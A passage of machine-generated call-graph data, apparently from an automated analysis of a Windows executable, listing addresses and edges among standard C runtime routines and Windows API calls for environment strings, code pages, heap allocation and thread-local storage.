7ff6fabf4c5c 16888->16889 16895 7ff6fabf4c57 16888->16895 16889->16895 16896 7ff6fabfacd0 GetLastError 16889->16896 16895->16887 16897 7ff6fabfacf4 FlsGetValue 16896->16897 16898 7ff6fabfad11 FlsSetValue 16896->16898 16899 7ff6fabfad0b 16897->16899 16901 7ff6fabfad01 16897->16901 16900 7ff6fabfad23 16898->16900 16898->16901 16899->16898 16903 7ff6fabfeb84 _get_daylight 11 API calls 16900->16903 16902 7ff6fabfad7d SetLastError 16901->16902 16904 7ff6fabfad9d 16902->16904 16905 7ff6fabf4c77 16902->16905 16906 7ff6fabfad32 16903->16906 16926 7ff6fabfa08c 16904->16926 16918 7ff6fabfd7cc 16905->16918 16908 7ff6fabfad50 FlsSetValue 16906->16908 16909 7ff6fabfad40 FlsSetValue 16906->16909 16912 7ff6fabfad6e 16908->16912 16913 7ff6fabfad5c FlsSetValue 16908->16913 16911 7ff6fabfad49 16909->16911 16915 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16911->16915 16914 7ff6fabfaa7c _get_daylight 11 API calls 16912->16914 16913->16911 16916 7ff6fabfad76 16914->16916 16915->16901 16917 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16916->16917 16917->16902 16919 7ff6fabfd7e1 16918->16919 16920 7ff6fabf4c9a 16918->16920 16919->16920 16970 7ff6fac03104 16919->16970 16922 7ff6fabfd838 16920->16922 16923 7ff6fabfd860 16922->16923 16924 7ff6fabfd84d 16922->16924 16923->16895 16924->16923 16983 7ff6fac02450 16924->16983 16935 7ff6fac03450 16926->16935 16961 7ff6fac03408 16935->16961 16966 7ff6fac001d8 EnterCriticalSection 16961->16966 16971 7ff6fabfacd0 __CxxCallCatchBlock 45 API calls 16970->16971 16972 7ff6fac03113 16971->16972 16973 7ff6fac0315e 16972->16973 16982 7ff6fac001d8 EnterCriticalSection 16972->16982 16973->16920 16984 7ff6fabfacd0 __CxxCallCatchBlock 45 API calls 16983->16984 16985 7ff6fac02459 16984->16985 16986 7ff6fac006d4 16987 7ff6fac006f8 16986->16987 16990 7ff6fac00708 16986->16990 16988 7ff6fabfb108 _get_daylight 11 API calls 16987->16988 16989 7ff6fac006fd 16988->16989 16991 7ff6fac009e8 16990->16991 16992 7ff6fac0072a 16990->16992 16993 7ff6fabfb108 _get_daylight 11 API calls 16991->16993 16994 7ff6fac0074b 16992->16994 17135 7ff6fac00d90 16992->17135 16995 7ff6fac009ed 16993->16995 16998 7ff6fac007bd 16994->16998 17000 7ff6fac00771 16994->17000 17005 7ff6fac007b1 16994->17005 16997 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16995->16997 16997->16989 17002 7ff6fabfeb84 _get_daylight 11 API calls 16998->17002 17015 7ff6fac00780 16998->17015 16999 7ff6fac0086a 17010 7ff6fac00887 16999->17010 17016 7ff6fac008d9 16999->17016 17150 7ff6fabf927c 17000->17150 17006 7ff6fac007d3 17002->17006 17004 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17004->16989 17005->16999 17005->17015 17156 7ff6fac0718c 17005->17156 17011 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17006->17011 17008 7ff6fac0077b 17013 7ff6fabfb108 _get_daylight 11 API calls 17008->17013 17009 7ff6fac00799 17009->17005 17017 7ff6fac00d90 45 API calls 17009->17017 17014 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17010->17014 17012 7ff6fac007e1 17011->17012 17012->17005 17012->17015 17019 7ff6fabfeb84 _get_daylight 11 API calls 17012->17019 17013->17015 17021 7ff6fac00890 17014->17021 17015->17004 17016->17015 17018 7ff6fac031dc 40 API calls 17016->17018 17017->17005 17020 7ff6fac00916 17018->17020 17022 7ff6fac00803 17019->17022 17023 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17020->17023 17024 7ff6fac031dc 40 API calls 17021->17024 17030 7ff6fac00895 17021->17030 17025 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17022->17025 17026 7ff6fac00920 17023->17026 17028 7ff6fac008c1 17024->17028 17025->17005 17026->17015 17026->17030 17027 7ff6fac009dc 17029 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17027->17029 17031 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17028->17031 17029->16989 17030->17027 17030->17030 17032 7ff6fabfeb84 _get_daylight 11 API calls 17030->17032 17031->17030 17033 7ff6fac00964 17032->17033 17034 7ff6fac00975 17033->17034 17035 7ff6fac0096c 17033->17035 17117 7ff6fabfa02c 17034->17117 17036 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17035->17036 17038 7ff6fac00973 17036->17038 17042 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17038->17042 17040 7ff6fac0098c 17192 7ff6fac072a4 17040->17192 17041 7ff6fac00a17 17044 7ff6fabfa4c4 _isindst 17 API calls 17041->17044 17042->16989 17045 7ff6fac00a2b 17044->17045 17047 7ff6fac00a54 17045->17047 17054 7ff6fac00a64 17045->17054 17050 7ff6fabfb108 _get_daylight 11 API calls 17047->17050 17048 7ff6fac009d4 17051 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17048->17051 17049 7ff6fac009b3 17052 7ff6fabfb108 _get_daylight 11 API calls 17049->17052 17079 7ff6fac00a59 17050->17079 17051->17027 17053 7ff6fac009b8 17052->17053 17056 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17053->17056 17055 7ff6fac00d47 17054->17055 17057 7ff6fac00a86 17054->17057 17058 7ff6fabfb108 _get_daylight 11 API calls 17055->17058 17056->17038 17059 7ff6fac00aa3 17057->17059 17211 7ff6fac00e78 17057->17211 17060 7ff6fac00d4c 17058->17060 17063 7ff6fac00b17 17059->17063 17065 7ff6fac00acb 17059->17065 17073 7ff6fac00b0b 17059->17073 17062 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17060->17062 17062->17079 17068 7ff6fac00b3f 17063->17068 17069 7ff6fabfeb84 _get_daylight 11 API calls 17063->17069 17084 7ff6fac00ada 17063->17084 17064 7ff6fac00bca 17077 7ff6fac00be7 17064->17077 17085 7ff6fac00c3a 17064->17085 17226 7ff6fabf92b8 17065->17226 17071 7ff6fabfeb84 _get_daylight 11 API calls 17068->17071 17068->17073 17068->17084 17074 7ff6fac00b31 17069->17074 17078 7ff6fac00b61 17071->17078 17072 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17072->17079 17073->17064 17073->17084 17232 7ff6fac0704c 17073->17232 17080 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17074->17080 17075 7ff6fac00ad5 17081 7ff6fabfb108 _get_daylight 11 API calls 17075->17081 17076 7ff6fac00af3 17076->17073 17087 7ff6fac00e78 45 API calls 17076->17087 17082 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17077->17082 17083 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17078->17083 17080->17068 17081->17084 17086 7ff6fac00bf0 17082->17086 17083->17073 17084->17072 17085->17084 17126 7ff6fac031dc 17085->17126 17091 7ff6fac031dc 40 API calls 17086->17091 17094 7ff6fac00bf6 17086->17094 17087->17073 17089 7ff6fac00c78 17090 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17089->17090 17092 7ff6fac00c82 17090->17092 17095 7ff6fac00c22 17091->17095 17092->17084 17092->17094 17093 7ff6fac00d3b 17097 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17093->17097 17094->17093 17098 7ff6fabfeb84 _get_daylight 11 API calls 17094->17098 17096 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17095->17096 17096->17094 17097->17079 17099 7ff6fac00cc7 17098->17099 17100 7ff6fac00ccf 17099->17100 17101 7ff6fac00cd8 17099->17101 17102 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17100->17102 17256 7ff6fac00374 17101->17256 17104 7ff6fac00cd6 17102->17104 17108 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17104->17108 17106 7ff6fac00cee SetEnvironmentVariableW 17109 7ff6fac00d33 17106->17109 17110 7ff6fac00d12 17106->17110 17107 7ff6fac00d7b 17111 7ff6fabfa4c4 _isindst 17 API calls 17107->17111 17108->17079 17113 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17109->17113 17114 7ff6fabfb108 _get_daylight 11 API calls 17110->17114 17112 7ff6fac00d8f 17111->17112 17113->17093 17115 7ff6fac00d17 17114->17115 17116 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17115->17116 17116->17104 17118 7ff6fabfa043 17117->17118 17119 7ff6fabfa039 17117->17119 17120 7ff6fabfb108 _get_daylight 11 API calls 17118->17120 17119->17118 17124 7ff6fabfa05e 17119->17124 17121 7ff6fabfa04a 17120->17121 17122 7ff6fabfa4a4 _invalid_parameter_noinfo 37 API calls 17121->17122 17123 7ff6fabfa056 17122->17123 17123->17040 17123->17041 17124->17123 17125 7ff6fabfb108 _get_daylight 11 API calls 17124->17125 17125->17121 17127 7ff6fac031fe 17126->17127 17128 7ff6fac0321b 17126->17128 17127->17128 17129 7ff6fac0320c 17127->17129 17132 7ff6fac03225 17128->17132 17277 7ff6fac07c98 17128->17277 17130 7ff6fabfb108 _get_daylight 11 API calls 17129->17130 17134 7ff6fac03211 memcpy_s 17130->17134 17265 7ff6fac07cd4 17132->17265 17134->17089 17136 7ff6fac00dc5 17135->17136 17137 7ff6fac00dad 17135->17137 17138 7ff6fabfeb84 _get_daylight 11 API calls 17136->17138 17137->16994 17144 7ff6fac00de9 17138->17144 17139 7ff6fac00e4a 17141 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17139->17141 17140 7ff6fabfa08c __CxxCallCatchBlock 45 API calls 17142 7ff6fac00e74 17140->17142 17141->17137 17143 7ff6fabfeb84 _get_daylight 11 API calls 17143->17144 17144->17139 17144->17143 17145 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17144->17145 17146 7ff6fabfa02c __std_exception_copy 37 API calls 17144->17146 17147 7ff6fac00e59 17144->17147 17149 7ff6fac00e6e 17144->17149 17145->17144 17146->17144 17148 7ff6fabfa4c4 _isindst 17 API calls 17147->17148 17148->17149 17149->17140 17151 7ff6fabf9295 17150->17151 17152 7ff6fabf928c 17150->17152 17151->17008 17151->17009 17152->17151 17291 7ff6fabf8d54 17152->17291 17157 7ff6fac0633c 17156->17157 17158 7ff6fac07199 17156->17158 17160 7ff6fac06349 17157->17160 17161 7ff6fac0637f 17157->17161 17159 7ff6fabf4c38 45 API calls 17158->17159 17163 7ff6fac071cd 17159->17163 17164 7ff6fabfb108 _get_daylight 11 API calls 17160->17164 17178 7ff6fac062f0 17160->17178 17162 7ff6fac063a9 17161->17162 17169 7ff6fac063ce 17161->17169 17165 7ff6fabfb108 _get_daylight 11 API calls 17162->17165 17166 7ff6fac071d2 17163->17166 17170 7ff6fac071e3 17163->17170 17174 7ff6fac071fa 17163->17174 17167 7ff6fac06353 17164->17167 17168 7ff6fac063ae 17165->17168 17166->17005 17171 7ff6fabfa4a4 _invalid_parameter_noinfo 37 API calls 17167->17171 17173 7ff6fabfa4a4 _invalid_parameter_noinfo 37 API calls 17168->17173 17179 7ff6fabf4c38 45 API calls 17169->17179 17185 7ff6fac063b9 17169->17185 17175 7ff6fabfb108 _get_daylight 11 API calls 17170->17175 17172 7ff6fac0635e 17171->17172 17172->17005 17173->17185 17176 7ff6fac07204 17174->17176 17177 7ff6fac07216 17174->17177 17180 7ff6fac071e8 17175->17180 17182 7ff6fabfb108 _get_daylight 11 API calls 17176->17182 17183 7ff6fac0723e 17177->17183 17184 7ff6fac07227 17177->17184 17178->17005 17179->17185 17181 7ff6fabfa4a4 _invalid_parameter_noinfo 37 API calls 17180->17181 17181->17166 17186 7ff6fac07209 17182->17186 17554 7ff6fac09034 17183->17554 17545 7ff6fac0638c 17184->17545 17185->17005 17189 7ff6fabfa4a4 _invalid_parameter_noinfo 37 API calls 17186->17189 17189->17166 17191 7ff6fabfb108 _get_daylight 11 API calls 17191->17166 17193 7ff6fabf4c38 45 API calls 17192->17193 17194 7ff6fac0730a 17193->17194 17196 7ff6fac07318 17194->17196 17594 7ff6fabfee10 17194->17594 17597 7ff6fabf52c8 17196->17597 17199 7ff6fac07404 17202 7ff6fac07415 17199->17202 17203 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17199->17203 17200 7ff6fabf4c38 45 API calls 17201 7ff6fac07387 17200->17201 17205 7ff6fabfee10 5 API calls 17201->17205 17210 7ff6fac07390 17201->17210 17204 7ff6fac009af 17202->17204 17206 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17202->17206 17203->17202 17204->17048 17204->17049 17205->17210 17206->17204 17207 7ff6fabf52c8 14 API calls 17208 7ff6fac073eb 17207->17208 17208->17199 17209 7ff6fac073f3 SetEnvironmentVariableW 17208->17209 17209->17199 17210->17207 17212 7ff6fac00e9b 17211->17212 17213 7ff6fac00eb8 17211->17213 17212->17059 17214 7ff6fabfeb84 _get_daylight 11 API calls 17213->17214 17220 7ff6fac00edc 17214->17220 17215 7ff6fac00f3d 17217 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17215->17217 17216 7ff6fabfa08c __CxxCallCatchBlock 45 API calls 17218 7ff6fac00f66 17216->17218 17217->17212 17219 7ff6fabfeb84 _get_daylight 11 API calls 17219->17220 17220->17215 17220->17219 17221 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17220->17221 17222 7ff6fac00374 37 API calls 17220->17222 17223 7ff6fac00f4c 17220->17223 17225 7ff6fac00f60 17220->17225 17221->17220 17222->17220 17224 7ff6fabfa4c4 _isindst 17 API calls 17223->17224 17224->17225 17225->17216 17227 7ff6fabf92c8 17226->17227 17230 7ff6fabf92d1 17226->17230 17227->17230 17619 7ff6fabf8dc8 17227->17619 17230->17075 17230->17076 17233 7ff6fac07086 17232->17233 17234 7ff6fac07059 17232->17234 17238 7ff6fac070ca 17233->17238 17240 7ff6fac070e9 17233->17240 17254 7ff6fac070be __crtLCMapStringW 17233->17254 17234->17233 17235 7ff6fac0705e 17234->17235 17236 7ff6fabfb108 _get_daylight 11 API calls 17235->17236 17237 7ff6fac07063 17236->17237 17239 7ff6fabfa4a4 _invalid_parameter_noinfo 37 API calls 17237->17239 17241 7ff6fabfb108 _get_daylight 11 API calls 17238->17241 17242 7ff6fac0706e 17239->17242 17243 7ff6fac07105 17240->17243 17244 7ff6fac070f3 17240->17244 17245 7ff6fac070cf 17241->17245 17242->17073 17248 7ff6fabf4c38 45 API calls 17243->17248 17247 7ff6fabfb108 _get_daylight 11 API calls 17244->17247 17246 7ff6fabfa4a4 _invalid_parameter_noinfo 37 API calls 17245->17246 17246->17254 17249 7ff6fac070f8 17247->17249 17250 7ff6fac07112 17248->17250 17251 7ff6fabfa4a4 _invalid_parameter_noinfo 37 API calls 17249->17251 17250->17254 17666 7ff6fac08bf0 17250->17666 17251->17254 17254->17073 17255 7ff6fabfb108 _get_daylight 11 API calls 17255->17254 17257 7ff6fac00381 17256->17257 17258 7ff6fac0038b 17256->17258 17257->17258 17263 7ff6fac003a7 17257->17263 17259 7ff6fabfb108 _get_daylight 11 API calls 17258->17259 17260 7ff6fac00393 17259->17260 17261 7ff6fabfa4a4 _invalid_parameter_noinfo 37 API calls 17260->17261 17262 7ff6fac0039f 17261->17262 17262->17106 17262->17107 17263->17262 17264 7ff6fabfb108 _get_daylight 11 API calls 17263->17264 17264->17260 17266 7ff6fac07cf3 17265->17266 17267 7ff6fac07ce9 17265->17267 17269 7ff6fac07cf8 17266->17269 17275 7ff6fac07cff _get_daylight 17266->17275 17284 7ff6fabfd444 17267->17284 17270 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17269->17270 17273 7ff6fac07cf1 17270->17273 17271 7ff6fac07d05 17274 7ff6fabfb108 _get_daylight 11 API calls 17271->17274 17272 7ff6fac07d32 RtlReAllocateHeap 17272->17273 17272->17275 17273->17134 17274->17273 17275->17271 17275->17272 17276 7ff6fac03390 _get_daylight 2 API calls 17275->17276 17276->17275 17278 7ff6fac07ca1 17277->17278 17279 7ff6fac07cba HeapSize 17277->17279 17280 7ff6fabfb108 _get_daylight 11 API calls 17278->17280 17281 7ff6fac07ca6 17280->17281 17282 7ff6fabfa4a4 _invalid_parameter_noinfo 37 API calls 17281->17282 17283 7ff6fac07cb1 17282->17283 17283->17132 17285 7ff6fabfd48f 17284->17285 17289 7ff6fabfd453 _get_daylight 17284->17289 17286 7ff6fabfb108 _get_daylight 11 API calls 17285->17286 17288 7ff6fabfd48d 17286->17288 17287 7ff6fabfd476 HeapAlloc 17287->17288 17287->17289 17288->17273 17289->17285 17289->17287 17290 7ff6fac03390 _get_daylight 2 API calls 17289->17290 17290->17289 17292 7ff6fabf8d6d 17291->17292 17293 7ff6fabf8d69 17291->17293 17314 7ff6fac023f0 17292->17314 17293->17151 17306 7ff6fabf90a8 17293->17306 17298 7ff6fabf8d7f 17300 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17298->17300 17299 7ff6fabf8d8b 17340 7ff6fabf8e38 17299->17340 17300->17293 17303 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17304 7ff6fabf8db2 17303->17304 17305 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17304->17305 17305->17293 17307 7ff6fabf90d1 17306->17307 17312 7ff6fabf90ea 17306->17312 17307->17151 17308 7ff6fabfeb84 _get_daylight 11 API calls 17308->17312 17309 7ff6fabf917a 17311 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17309->17311 17310 7ff6fac005f4 WideCharToMultiByte 17310->17312 17311->17307 17312->17307 17312->17308 17312->17309 17312->17310 17313 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17312->17313 17313->17312 17315 7ff6fac023fd 17314->17315 17316 7ff6fabf8d72 17314->17316 17359 7ff6fabfada4 17315->17359 17320 7ff6fac0272c GetEnvironmentStringsW 17316->17320 17321 7ff6fabf8d77 17320->17321 17322 7ff6fac0275c 17320->17322 17321->17298 17321->17299 17323 7ff6fac005f4 WideCharToMultiByte 17322->17323 17324 7ff6fac027ad 17323->17324 17325 7ff6fac027b4 FreeEnvironmentStringsW 17324->17325 17326 7ff6fabfd444 _fread_nolock 12 API calls 17324->17326 17325->17321 17327 7ff6fac027c7 17326->17327 17328 7ff6fac027cf 17327->17328 17329 7ff6fac027d8 17327->17329 17330 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17328->17330 17331 7ff6fac005f4 WideCharToMultiByte 17329->17331 17332 7ff6fac027d6 17330->17332 17333 7ff6fac027fb 17331->17333 17332->17325 17334 7ff6fac027ff 17333->17334 17335 7ff6fac02809 17333->17335 17336 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17334->17336 17337 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17335->17337 17338 7ff6fac02807 FreeEnvironmentStringsW 17336->17338 17337->17338 17338->17321 17341 7ff6fabf8e5d 17340->17341 17342 7ff6fabfeb84 _get_daylight 11 API calls 17341->17342 17354 7ff6fabf8e93 17342->17354 17343 7ff6fabf8e9b 17344 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17343->17344 17346 7ff6fabf8d93 17344->17346 17345 7ff6fabf8f0e 17347 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17345->17347 17346->17303 17347->17346 17348 7ff6fabfeb84 _get_daylight 11 API calls 17348->17354 17349 7ff6fabf8efd 17539 7ff6fabf9064 17349->17539 17350 7ff6fabfa02c __std_exception_copy 37 API calls 17350->17354 17353 7ff6fabf8f33 17356 7ff6fabfa4c4 _isindst 17 API calls 17353->17356 17354->17343 17354->17345 17354->17348 17354->17349 17354->17350 17354->17353 17357 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17354->17357 17355 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17355->17343 17358 7ff6fabf8f46 17356->17358 17357->17354 17360 7ff6fabfadb5 FlsGetValue 17359->17360 17361 7ff6fabfadd0 FlsSetValue 17359->17361 17362 7ff6fabfadc2 17360->17362 17363 7ff6fabfadca 17360->17363 17361->17362 17364 7ff6fabfaddd 17361->17364 17365 7ff6fabfa08c __CxxCallCatchBlock 45 API calls 17362->17365 17367 7ff6fabfadc8 17362->17367 17363->17361 17366 7ff6fabfeb84 _get_daylight 11 API calls 17364->17366 17368 7ff6fabfae45 17365->17368 17369 7ff6fabfadec 17366->17369 17379 7ff6fac020c4 17367->17379 17370 7ff6fabfae0a FlsSetValue 17369->17370 17371 7ff6fabfadfa FlsSetValue 17369->17371 17372 7ff6fabfae28 17370->17372 17373 7ff6fabfae16 FlsSetValue 17370->17373 17374 7ff6fabfae03 17371->17374 17375 7ff6fabfaa7c _get_daylight 11 API calls 17372->17375 17373->17374 17376 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17374->17376 17377 7ff6fabfae30 17375->17377 17376->17362 17378 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17377->17378 17378->17367 17402 7ff6fac02334 17379->17402 17381 7ff6fac020f9 17417 7ff6fac01dc4 17381->17417 17384 7ff6fac02116 17384->17316 17385 7ff6fabfd444 _fread_nolock 12 API calls 17386 7ff6fac02127 17385->17386 17387 7ff6fac0212f 17386->17387 17389 7ff6fac0213e 17386->17389 17388 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17387->17388 17388->17384 17389->17389 17424 7ff6fac0246c 17389->17424 17392 7ff6fac0223a 17393 7ff6fabfb108 _get_daylight 11 API calls 17392->17393 17394 7ff6fac0223f 17393->17394 17397 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17394->17397 17395 7ff6fac02295 17396 7ff6fac022fc 17395->17396 17435 7ff6fac01bf4 17395->17435 17400 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17396->17400 17397->17384 17398 7ff6fac02254 17398->17395 17401 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17398->17401 17400->17384 17401->17395 17403 7ff6fac02357 17402->17403 17404 7ff6fac02361 17403->17404 17450 7ff6fac001d8 EnterCriticalSection 17403->17450 17408 7ff6fac023d3 17404->17408 17409 7ff6fabfa08c __CxxCallCatchBlock 45 API calls 17404->17409 17408->17381 17411 7ff6fac023eb 17409->17411 17413 7ff6fac02442 17411->17413 17414 7ff6fabfada4 50 API calls 17411->17414 17413->17381 17415 7ff6fac0242c 17414->17415 17416 7ff6fac020c4 65 API calls 17415->17416 17416->17413 17418 7ff6fabf4c38 45 API calls 17417->17418 17419 7ff6fac01dd8 17418->17419 17420 7ff6fac01de4 GetOEMCP 17419->17420 17421 7ff6fac01df6 17419->17421 17422 7ff6fac01e0b 17420->17422 17421->17422 17423 7ff6fac01dfb GetACP 17421->17423 17422->17384 17422->17385 17423->17422 17425 7ff6fac01dc4 47 API calls 17424->17425 17426 7ff6fac02499 17425->17426 17427 7ff6fac025ef 17426->17427 17429 7ff6fac024d6 IsValidCodePage 17426->17429 17434 7ff6fac024f0 memcpy_s 17426->17434 17428 7ff6fabea9b0 _log10_special 8 API calls 17427->17428 17430 7ff6fac02231 17428->17430 17429->17427 17431 7ff6fac024e7 17429->17431 17430->17392 17430->17398 17432 7ff6fac02516 GetCPInfo 17431->17432 17431->17434 17432->17427 17432->17434 17434->17434 17451 7ff6fac01edc 17434->17451 17538 7ff6fac001d8 EnterCriticalSection 17435->17538 17452 7ff6fac01f19 GetCPInfo 17451->17452 17453 7ff6fac0200f 17451->17453 17452->17453 17459 7ff6fac01f2c 17452->17459 17454 7ff6fabea9b0 _log10_special 8 API calls 17453->17454 17455 7ff6fac020ae 17454->17455 17455->17427 17462 7ff6fac02c40 17459->17462 17463 7ff6fabf4c38 45 API calls 17462->17463 17464 7ff6fac02c82 17463->17464 17482 7ff6fabff7a0 17464->17482 17484 7ff6fabff7a9 MultiByteToWideChar 17482->17484 17540 7ff6fabf8f05 17539->17540 17541 7ff6fabf9069 17539->17541 17540->17355 17542 7ff6fabf9092 17541->17542 17544 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17541->17544 17543 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17542->17543 17543->17540 17544->17541 17546 7ff6fac063c0 17545->17546 17547 7ff6fac063a9 17545->17547 17546->17547 17550 7ff6fac063ce 17546->17550 17548 7ff6fabfb108 _get_daylight 11 API calls 17547->17548 17549 7ff6fac063ae 17548->17549 17551 7ff6fabfa4a4 _invalid_parameter_noinfo 37 API calls 17549->17551 17552 7ff6fabf4c38 45 API calls 17550->17552 17553 7ff6fac063b9 17550->17553 17551->17553 17552->17553 17553->17166 17555 7ff6fabf4c38 45 API calls 17554->17555 17556 7ff6fac09059 17555->17556 17559 7ff6fac08cb0 17556->17559 17561 7ff6fac08cfe 17559->17561 17560 7ff6fabea9b0 _log10_special 8 API calls 17562 7ff6fac07265 17560->17562 17563 7ff6fac08d85 17561->17563 17565 7ff6fac08d70 GetCPInfo 17561->17565 17568 7ff6fac08d89 17561->17568 17562->17166 17562->17191 17564 7ff6fabff7a0 _fread_nolock MultiByteToWideChar 17563->17564 17563->17568 17566 7ff6fac08e1d 17564->17566 17565->17563 17565->17568 17567 7ff6fabfd444 _fread_nolock 12 API calls 17566->17567 17566->17568 17569 7ff6fac08e54 17566->17569 17567->17569 17568->17560 17569->17568 17570 7ff6fabff7a0 _fread_nolock MultiByteToWideChar 17569->17570 17571 7ff6fac08ec2 17570->17571 17572 7ff6fabff7a0 _fread_nolock MultiByteToWideChar 17571->17572 17581 7ff6fac08fa4 17571->17581 17574 7ff6fac08ee8 17572->17574 17573 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17573->17568 17575 7ff6fabfd444 _fread_nolock 12 API calls 17574->17575 17576 7ff6fac08f15 17574->17576 17574->17581 17575->17576 17577 7ff6fabff7a0 _fread_nolock MultiByteToWideChar 17576->17577 17576->17581 17578 7ff6fac08f8c 17577->17578 17579 7ff6fac08fac 17578->17579 17580 7ff6fac08f92 17578->17580 17588 7ff6fabfee54 17579->17588 17580->17581 17583 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17580->17583 17581->17568 17581->17573 17583->17581 17585 7ff6fac08feb 17585->17568 17587 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17585->17587 17586 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17586->17585 17587->17568 17589 7ff6fabfebfc __crtLCMapStringW 5 API calls 17588->17589 17590 7ff6fabfee92 17589->17590 17591 7ff6fabff0bc __crtLCMapStringW 5 API calls 17590->17591 17593 7ff6fabfee9a 17590->17593 17592 7ff6fabfef03 CompareStringW 17591->17592 17592->17593 17593->17585 17593->17586 17595 7ff6fabfebfc __crtLCMapStringW 5 API calls 17594->17595 17596 7ff6fabfee30 17595->17596 17596->17196 17598 7ff6fabf52f2 17597->17598 17599 7ff6fabf5316 17597->17599 17603 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17598->17603 17606 7ff6fabf5301 17598->17606 17600 7ff6fabf5370 17599->17600 17601 7ff6fabf531b 17599->17601 17602 7ff6fabff7a0 _fread_nolock MultiByteToWideChar 17600->17602 17604 7ff6fabf5330 17601->17604 17601->17606 17607 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17601->17607 17614 7ff6fabf538c 17602->17614 17603->17606 17608 7ff6fabfd444 _fread_nolock 12 API calls 17604->17608 17605 7ff6fabf5393 GetLastError 17609 7ff6fabfb07c _fread_nolock 11 API calls 17605->17609 17606->17199 17606->17200 17607->17604 17608->17606 17612 7ff6fabf53a0 17609->17612 17610 7ff6fabf53ce 17610->17606 17611 7ff6fabff7a0 _fread_nolock MultiByteToWideChar 17610->17611 17615 7ff6fabf5412 17611->17615 17616 7ff6fabfb108 _get_daylight 11 API calls 17612->17616 17613 7ff6fabf53c1 17618 7ff6fabfd444 _fread_nolock 12 API calls 17613->17618 17614->17605 17614->17610 17614->17613 17617 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17614->17617 17615->17605 17615->17606 17616->17606 17617->17613 17618->17610 17620 7ff6fabf8de1 17619->17620 17627 7ff6fabf8ddd 17619->17627 17640 7ff6fac0283c GetEnvironmentStringsW 17620->17640 17623 7ff6fabf8dee 17625 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17623->17625 17624 